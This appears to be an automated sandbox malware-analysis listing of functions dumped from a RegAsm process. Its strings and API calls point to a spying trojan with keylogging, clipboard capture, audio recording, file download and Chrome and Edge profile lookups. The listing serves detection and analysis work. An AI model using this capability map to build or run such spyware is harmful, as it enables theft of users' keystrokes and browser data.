                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                • String ID: *?$.
                                                                                • API String ID: 2667617558-3972193922
                                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                Function 0044569C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __alloca_probe_16__freea
                                                                                • String ID: p54
                                                                                • API String ID: 1635606685-674596673
                                                                                • Opcode ID: ad763113ce13b2b8e626d2ff443e146e726dc092d285a8402790d1a017a5485e
                                                                                • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                                                                • Opcode Fuzzy Hash: ad763113ce13b2b8e626d2ff443e146e726dc092d285a8402790d1a017a5485e
                                                                                • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                                                                Function 00418ACD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 1291196975-3785015651
                                                                                • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Init_thread_footer__onexit
                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                • API String ID: 1881088180-3686566968
                                                                                • Opcode ID: 459b93ccdfbe79761df0a70f5ac2c7da3f443c0cd847223ec51b5d776f13febb
                                                                                • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                • Opcode Fuzzy Hash: 459b93ccdfbe79761df0a70f5ac2c7da3f443c0cd847223ec51b5d776f13febb
                                                                                • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 0-711371036
                                                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                Function 00418BCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                • String ID: image/png
                                                                                • API String ID: 1291196975-2966254431
                                                                                • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                Function 00449C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00449CBC
                                                                                • GetFileType.KERNEL32 ref: 00449CCE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleType
                                                                                • String ID: (3
                                                                                • API String ID: 3000768030-2570504824
                                                                                • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                                                • Instruction ID: 0971e15b3ed75ae4f19990cc7af9cd82d4526e04a272429d5fd5d939a02a2197
                                                                                • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                                                • Instruction Fuzzy Hash: EF11907250475246E7308F3E9CC8223BAD5AB52331B38072BD5B7966F1C328DC82F249
                                                                                Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 481472006-1507639952
                                                                                • Opcode ID: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                                                                • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                • Opcode Fuzzy Hash: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                                                                • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                Function 0043C140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: (3
                                                                                • API String ID: 269201875-2570504824
                                                                                • Opcode ID: a2428ff8ab59787430994614f1cdcbbcc79b6a8db48f282cb9abbb4e08a31653
                                                                                • Instruction ID: 50f29c45267cc5de65db45c76c11a9fc4df43ae0f191c64cb21c29ff245d41fa
                                                                                • Opcode Fuzzy Hash: a2428ff8ab59787430994614f1cdcbbcc79b6a8db48f282cb9abbb4e08a31653
                                                                                • Instruction Fuzzy Hash: 9011D371A002004AEF309F39AC81B563294A714734F15172BF929EA3D6D3BCD8825F89
                                                                                Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32 ref: 0041667B
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DownloadFileSleep
                                                                                • String ID: !D@
                                                                                • API String ID: 1931167962-604454484
                                                                                • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen
                                                                                • String ID: : $Se.
                                                                                • API String ID: 4218353326-4089948878
                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                • API String ID: 481472006-2430845779
                                                                                • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: alarm.wav$hYG
                                                                                • API String ID: 1174141254-2782910960
                                                                                • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                • String ID: Online Keylogger Stopped
                                                                                • API String ID: 1623830855-1496645233
                                                                                • Opcode ID: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                • Opcode Fuzzy Hash: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3476068407-410509341
                                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                Function 00449ADC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                • DeleteCriticalSection.KERNEL32(00471090,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                                                                • _free.LIBCMT ref: 00449B4C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnter_free
                                                                                • String ID: (3
                                                                                • API String ID: 1836352639-2570504824
                                                                                • Opcode ID: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                                                                • Instruction ID: 49f98359192604db3700e7d46e2ee0879056decf89b11c46129577f8840becb7
                                                                                • Opcode Fuzzy Hash: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                                                                • Instruction Fuzzy Hash: C3115E31500214DFEB20DFA8E846B5D73B0FB04724F10455AE8599B2E6CBBCEC429B0D
                                                                                Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • waveInPrepareHeader.WINMM(003191F8,00000020,?), ref: 00401849
                                                                                • waveInAddBuffer.WINMM(003191F8,00000020), ref: 0040185F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                • String ID: XMG
                                                                                • API String ID: 2315374483-813777761
                                                                                • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocaleValid
                                                                                • String ID: IsValidLocaleName$kKD
                                                                                • API String ID: 1901932003-3269126172
                                                                                • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                • API String ID: 1174141254-4188645398
                                                                                • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                • API String ID: 1174141254-2800177040
                                                                                • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
